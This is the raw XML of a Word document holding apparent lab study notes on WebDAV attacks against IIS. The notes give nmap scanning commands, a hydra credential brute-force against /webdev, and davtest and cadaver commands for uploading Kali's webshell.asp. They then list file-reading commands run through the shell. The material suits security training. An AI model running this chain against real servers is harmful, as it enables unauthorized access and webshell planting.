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D861" w14:textId="4AE2B87F" w:rsidR="00853ABF" w:rsidRDefault="003C735E">
      <w:r w:rsidRPr="003C735E">
        <w:t>WebDAV Vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8F4BF1" w14:textId="05B3D4E2" w:rsidR="00EC3DD0" w:rsidRPr="00EC3DD0" w:rsidRDefault="00EC3DD0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC3DD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IIS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C58BFB" w14:textId="7EF748A6" w:rsidR="003C735E" w:rsidRDefault="002835FB">
      <w:r>
        <w:t>IIS = internet information service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F962B5" w14:textId="38AF9B5C" w:rsidR="004A747B" w:rsidRDefault="004A747B">
      <w:r>
        <w:t xml:space="preserve">It </w:t>
      </w:r>
      <w:r w:rsidR="00605169">
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> same as the </w:t>
      </w:r>
      <w:r w:rsidR="00605169">
        <w:t>Apache</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00605169">
        <w:t>nginx</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE28B95" w14:textId="46D3B4BD" w:rsidR="004A747B" w:rsidRDefault="00932F22">
      <w:r>
        <w:t>Supported executables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47356D24" w14:textId="3E6625F1" w:rsidR="00932F22" w:rsidRDefault="00932F22">
      <w:r>
        <w:t>.asp , .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aspx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> , .config , .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="431C359D" w14:textId="77777777" w:rsidR="00932F22" w:rsidRDefault="00932F22"/>
    <w:p w14:paraId="790539B2" w14:textId="0E1A1600" w:rsidR="00EC3DD0" w:rsidRPr="00EC3DD0" w:rsidRDefault="00EC3DD0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC3DD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WebDEV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC3DD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124C0CDF" w14:textId="69CB648E" w:rsidR="00EC3DD0" w:rsidRDefault="00EC3DD0">
      <w:r>
        <w:t>Web-base distributed authoring and versioning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF9FC3E" w14:textId="76F00C51" w:rsidR="00EC3DD0" w:rsidRDefault="00EC3DD0">
      <w:r>
        <w:t>Edit and manage file on the remote web server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C52A64E" w14:textId="24AB1820" w:rsidR="00EC3DD0" w:rsidRDefault="00761A27">
      <w:r>
        <w:t xml:space="preserve">Required credential if they are enabled to connect to </w:t>
      </w:r>
      <w:r w:rsidR="009E6256">
        <w:t>the WebDAV</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133212C8" w14:textId="77777777" w:rsidR="009E6256" w:rsidRDefault="009E6256"/>
    <w:p w14:paraId="487596C8" w14:textId="7D88CDDC" w:rsidR="001C4D6D" w:rsidRDefault="001C4D6D" w:rsidP="001C4D6D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC3DD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WebDEV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploitation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F9ED9F" w14:textId="32408041" w:rsidR="001C4D6D" w:rsidRDefault="005F34FE" w:rsidP="001C4D6D">
      <w:r>
        <w:t xml:space="preserve">Check the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webdev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> run on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604EC9E5" w14:textId="37998362" w:rsidR="005F34FE" w:rsidRDefault="005F34FE" w:rsidP="001C4D6D">
      <w:r>
        <w:t xml:space="preserve">Then brute </w:t>
      </w:r>
      <w:r w:rsidR="003142B3">
        <w:t>forces</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to find legitimate credential.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50848447" w14:textId="76DBFA93" w:rsidR="005F34FE" w:rsidRDefault="005F34FE" w:rsidP="001C4D6D">
      <w:r>
        <w:t xml:space="preserve">Then authenticate on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webdev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and upload malicious </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.asp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> file to </w:t>
      </w:r>
      <w:r w:rsidR="003142B3">
        <w:t>execute</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> commands or obtain  the reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541C8CDE" w14:textId="77777777" w:rsidR="003142B3" w:rsidRDefault="003142B3" w:rsidP="001C4D6D"/>
    <w:p w14:paraId="45CFF3EB" w14:textId="3D067D68" w:rsidR="003142B3" w:rsidRPr="003142B3" w:rsidRDefault="003142B3" w:rsidP="001C4D6D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003142B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2126A209" w14:textId="7BB177C5" w:rsidR="003142B3" w:rsidRPr="003142B3" w:rsidRDefault="003142B3" w:rsidP="001C4D6D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003142B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Davtest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003142B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327B5AB2" w14:textId="7D81835B" w:rsidR="003142B3" w:rsidRDefault="003142B3" w:rsidP="001C4D6D">
      <w:r>
        <w:t xml:space="preserve">Scan </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0708FC" w14:textId="760FCC95" w:rsidR="003142B3" w:rsidRDefault="003142B3" w:rsidP="001C4D6D">
      <w:r>
        <w:t xml:space="preserve">Authenticate </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CC25AA" w14:textId="43232528" w:rsidR="003142B3" w:rsidRDefault="003142B3" w:rsidP="001C4D6D">
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0849ED71" w14:textId="77777777" w:rsidR="003142B3" w:rsidRDefault="003142B3" w:rsidP="001C4D6D"/>
    <w:p w14:paraId="68EE92FB" w14:textId="751F9302" w:rsidR="003142B3" w:rsidRPr="003142B3" w:rsidRDefault="003142B3" w:rsidP="001C4D6D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003142B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cadaver:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5925F413" w14:textId="5492A4AF" w:rsidR="003142B3" w:rsidRDefault="003142B3" w:rsidP="001C4D6D">
      <w:r>
        <w:t>Authenticate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F201399" w14:textId="33DADB5A" w:rsidR="003142B3" w:rsidRDefault="003142B3" w:rsidP="001C4D6D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Upload and download file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EC19CC" w14:textId="792FB594" w:rsidR="003142B3" w:rsidRPr="005F34FE" w:rsidRDefault="003142B3" w:rsidP="001C4D6D">
      <w:r>
        <w:t xml:space="preserve">And also other </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>funcationality</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7F8BECAA" w14:textId="77777777" w:rsidR="001C4D6D" w:rsidRDefault="001C4D6D"/>
    <w:p w14:paraId="4901462E" w14:textId="358DF16C" w:rsidR="00761A27" w:rsidRPr="00AA7276" w:rsidRDefault="00AA7276">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7276">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6737CC44" w14:textId="77777777" w:rsidR="00AA7276" w:rsidRDefault="00AA7276"/>
    <w:p w14:paraId="02E7E8E7" w14:textId="58BD2C52" w:rsidR="00D12608" w:rsidRDefault="00D12608">
      <w:r>
        <w:t>Nmap -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip_address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="58B5B293" w14:textId="77777777" w:rsidR="00D12608" w:rsidRDefault="00D12608"/>
    <w:p w14:paraId="56891D92" w14:textId="3D853AB8" w:rsidR="00CE5823" w:rsidRDefault="00CE5823" w:rsidP="00CE5823">
      <w:r>
        <w:t>Nmap -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  -</w:t>
      </w:r>
      <w:r>
        <w:t>p 80 –script=http-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>enum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  ip_addr</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0D1ADFFB" w14:textId="77777777" w:rsidR="002835FB" w:rsidRDefault="002835FB"/>
    <w:p w14:paraId="65E53BE7" w14:textId="2638021C" w:rsidR="00CE5823" w:rsidRDefault="00CE5823">
      <w:r>
        <w:t>script=http-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>enum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C38EF49" w14:textId="3A4DD944" w:rsidR="00CE5823" w:rsidRDefault="00CE5823">
      <w:r>
        <w:t xml:space="preserve">it help in finding the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webdev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B312D1" w14:textId="77777777" w:rsidR="00CE5823" w:rsidRDefault="00CE5823"/>
    <w:p w14:paraId="3B6674F3" w14:textId="5CDDAAC9" w:rsidR="00ED3680" w:rsidRDefault="00E82766">
      <w:r>
        <w:t xml:space="preserve">After we finding that we move to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webdev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> directory and try to login it</w:t>
      </w:r>
      <w:r w:rsidR="00F83911">
        <w:t xml:space="preserve"> as authentication is enabled</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFDFA46" w14:textId="77777777" w:rsidR="00E82766" w:rsidRDefault="00E82766"/>
    <w:p w14:paraId="20D2F572" w14:textId="4BEA4D88" w:rsidR="00C67EEA" w:rsidRDefault="00C67EEA">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Bruteforce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> any folder on the web page then require </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>authnetication</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E547F03" w14:textId="6819B400" w:rsidR="00C67EEA" w:rsidRDefault="00C67EEA">
      <w:r>
        <w:t>Hydra -l /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/share/wordlist/Metasploit/common_users.txt -P </w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/share/wordlist/Metasploit/common_</w:t>
      </w:r>
      <w:r>
        <w:t>passwords</w:t>
      </w:r>
      <w:r>
        <w:t>.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip_address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  http-get /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webdev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BACB56B" w14:textId="77777777" w:rsidR="00C67EEA" w:rsidRDefault="00C67EEA"/>
    <w:p w14:paraId="48E586D4" w14:textId="764DFB21" w:rsidR="00C67EEA" w:rsidRDefault="00C67EEA">
      <w:r>
        <w:t xml:space="preserve">This command is used to perform </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C625DE">
        <w:t>Bruteforce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webdev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694BA192" w14:textId="28A8143B" w:rsidR="00C67EEA" w:rsidRDefault="00C625DE">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E8FCEB" w14:textId="7348973F" w:rsidR="004859FC" w:rsidRDefault="004859FC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Then after getting access to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wedev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> folder as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webdev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> protocol allow use to upload ,download ,delete ,edit the file on it, so we us the tool for doing this is</w:t>
      </w:r>
      <w:r w:rsidRPr="004859FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> DAVTEST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3AAE55" w14:textId="77777777" w:rsidR="004859FC" w:rsidRDefault="004859FC"/>
    <w:p w14:paraId="70763BD8" w14:textId="77777777" w:rsidR="004859FC" w:rsidRDefault="004859FC">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Davtest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -auth </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>username:password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="008B6766">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://ip_address/webdev(directory)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="58A208F3" w14:textId="77777777" w:rsidR="004859FC" w:rsidRDefault="004859FC">
      <w:r>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022D80A3" w14:textId="77777777" w:rsidR="004859FC" w:rsidRDefault="004859FC">
      <w:r>
        <w:t>The files we able to upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBAA035" w14:textId="77777777" w:rsidR="004859FC" w:rsidRDefault="004859FC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The files we able to execute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020C3765" w14:textId="77777777" w:rsidR="006F1EB0" w:rsidRDefault="006F1EB0"/>
    <w:p w14:paraId="666CA3A2" w14:textId="36FEC1DE" w:rsidR="004859FC" w:rsidRDefault="006F1EB0">
      <w:r>
        <w:t>Then we use</w:t>
      </w:r>
      <w:r w:rsidR="00493741">
        <w:t xml:space="preserve"> CADVER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  to upload the file</w:t>
      </w:r>
      <w:r w:rsidR="004859FC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11119A02" w14:textId="77777777" w:rsidR="00493741" w:rsidRDefault="00493741"/>
    <w:p w14:paraId="1664B728" w14:textId="77777777" w:rsidR="00493741" w:rsidRDefault="00493741">
      <w:r>
        <w:t xml:space="preserve">Cadaver </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="008B6766">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://ip_address/directory</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3BDECB" w14:textId="3CCBD6DD" w:rsidR="006F6FBA" w:rsidRDefault="00971DD8">
      <w:r>
        <w:t>then it provide the shell after getting the username and password</w:t>
      </w:r>
      <w:r w:rsidR="006F6FBA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9572B5" w14:textId="77777777" w:rsidR="006F6FBA" w:rsidRDefault="006F6FBA"/>
    <w:p w14:paraId="5ADDF565" w14:textId="18DD5835" w:rsidR="006F6FBA" w:rsidRDefault="006F6FBA">
      <w:r>
        <w:t xml:space="preserve">As the kali comes pre package with the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> so we use them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D577A5A" w14:textId="541C73E4" w:rsidR="006F6FBA" w:rsidRDefault="006F6FBA">
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>weshells</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/asp/webshell.asp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAB3E4C" w14:textId="77777777" w:rsidR="006F6FBA" w:rsidRDefault="006F6FBA"/>
    <w:p w14:paraId="4BCE9AEF" w14:textId="308A9150" w:rsidR="006F6FBA" w:rsidRDefault="006F6FBA">
      <w:r>
        <w:t>Then we upload it on the webserver by using put command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D2A869" w14:textId="77777777" w:rsidR="006F6FBA" w:rsidRDefault="006F6FBA" w:rsidP="006F6FBA">
      <w:r>
        <w:t xml:space="preserve">Put  </w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>weshells</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/asp/webshell.asp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C73526" w14:textId="1371A5F2" w:rsidR="006F6FBA" w:rsidRDefault="006F6FBA">
      <w:r>
        <w:t xml:space="preserve"> And then access the website on the browser and select the webshell.asp and perform the action such as :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A6957D" w14:textId="7DE712B7" w:rsidR="006F6FBA" w:rsidRDefault="006F6FBA">
      <w:r>
        <w:t>See the directories in c folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69688472" w14:textId="0A46A00D" w:rsidR="006F6FBA" w:rsidRDefault="006F6FBA">
      <w:r>
        <w:t>Dir c:\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8D7BFF" w14:textId="6272685A" w:rsidR="006F6FBA" w:rsidRDefault="006F6FBA">
      <w:r>
        <w:t>Display content of any file in c directory:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>type c:\flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1A4804" w14:textId="77777777" w:rsidR="006F6FBA" w:rsidRDefault="006F6FBA"/>
    <w:p w14:paraId="53A22673" w14:textId="77777777" w:rsidR="006F6FBA" w:rsidRDefault="006F6FBA"/>
    <w:p w14:paraId="6A64BA76" w14:textId="6FDEDBC6" w:rsidR="004859FC" w:rsidRDefault="00493741">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6B3D62" w14:textId="77777777" w:rsidR="006F1EB0" w:rsidRDefault="006F1EB0"/>
    <w:p w14:paraId="5D233A0A" w14:textId="77777777" w:rsidR="006F1EB0" w:rsidRDefault="006F1EB0"/>
    <w:p w14:paraId="79C669F6" w14:textId="77777777" w:rsidR="006F1EB0" w:rsidRDefault="006F1EB0"/>
    <w:p w14:paraId="5127DA8C" w14:textId="77777777" w:rsidR="006F1EB0" w:rsidRDefault="006F1EB0"/>
    <w:p w14:paraId="48EBD2C1" w14:textId="77777777" w:rsidR="006F1EB0" w:rsidRDefault="006F1EB0"/>
    <w:p w14:paraId="386BA2A5" w14:textId="77777777" w:rsidR="006F1EB0" w:rsidRDefault="006F1EB0"/>
    <w:p w14:paraId="2B4F73E2" w14:textId="77777777" w:rsidR="006F1EB0" w:rsidRDefault="006F1EB0"/>
    <w:p w14:paraId="5F1A868D" w14:textId="77777777" w:rsidR="006F1EB0" w:rsidRDefault="006F1EB0"/>
    <w:p w14:paraId="3E9E0323" w14:textId="77777777" w:rsidR="006F1EB0" w:rsidRDefault="006F1EB0"/>
    <w:p w14:paraId="2F2A70A8" w14:textId="77777777" w:rsidR="006F1EB0" w:rsidRDefault="006F1EB0"/>
    <w:p w14:paraId="07D3727C" w14:textId="77777777" w:rsidR="006F1EB0" w:rsidRDefault="006F1EB0"/>
    <w:p w14:paraId="66F260A5" w14:textId="77777777" w:rsidR="006F1EB0" w:rsidRDefault="006F1EB0"/>
    <w:p w14:paraId="73D2EEAA" w14:textId="77777777" w:rsidR="006F1EB0" w:rsidRDefault="006F1EB0"/>
    <w:p w14:paraId="6B9F74A9" w14:textId="77777777" w:rsidR="006F1EB0" w:rsidRDefault="006F1EB0"/>
    <w:p w14:paraId="5B65A585" w14:textId="77777777" w:rsidR="006F1EB0" w:rsidRPr="006F1EB0" w:rsidRDefault="006F1EB0" w:rsidP="006F1EB0">
      <w:r w:rsidRPr="006F1EB0">
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="006F1EB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.asp</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1EB0">
        <w:t xml:space="preserve"> file is a web page script used by Microsoft servers to make dynamic sites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658BC345" w14:textId="77777777" w:rsidR="006F1EB0" w:rsidRPr="006F1EB0" w:rsidRDefault="006F1EB0" w:rsidP="006F1EB0">
      <w:r w:rsidRPr="006F1EB0">
        <w:t>The server runs the code in the .asp file, and you only see the final output (HTML), not the actual code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D37FA54" w14:textId="348FE269" w:rsidR="006F1EB0" w:rsidRDefault="00493741">
      <w:r w:rsidRPr="00493741">
        <w:t>It’s used to create dynamic web pages (pages that can change based on user input, database results, etc.) rather than just showing static HTML.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="006F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75"/>
    <w:rsid w:val="000A7429"/>
    <w:rsid w:val="001C4D6D"/>
    <w:rsid w:val="00206E0F"/>
    <w:rsid w:val="00266979"/>
    <w:rsid w:val="002835FB"/>
    <w:rsid w:val="003142B3"/>
    <w:rsid w:val="003C735E"/>
    <w:rsid w:val="004859FC"/>
    <w:rsid w:val="00493741"/>
    <w:rsid w:val="004A747B"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="005F34FE"/>
    <w:rsid w:val="00605169"/>
    <w:rsid w:val="006A053D"/>
    <w:rsid w:val="006F1EB0"/>
    <w:rsid w:val="006F6FBA"/>
    <w:rsid w:val="00761A27"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00932F22"/>
    <w:rsid w:val="00971DD8"/>
    <w:rsid w:val="009E6256"/>
    <w:rsid w:val="00A25275"/>
    <w:rsid w:val="00AA7276"/>
    <w:rsid w:val="00C625DE"/>
    <w:rsid w:val="00C67EEA"/>
    <w:rsid w:val="00CE5823"/>
    <w:rsid w:val="00D12608"/>
    <w:rsid w:val="00E82766"/>
    <w:rsid w:val="00EC3DD0"/>
    <w:rsid w:val="00ED3680"/>
    <w:rsid w:val="00F8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4BFC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6B620C3D-D69D-4A25-A1F8-3A7A55C7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ip_address/directory" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ip_address/webdev(directory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30</cp:revision>
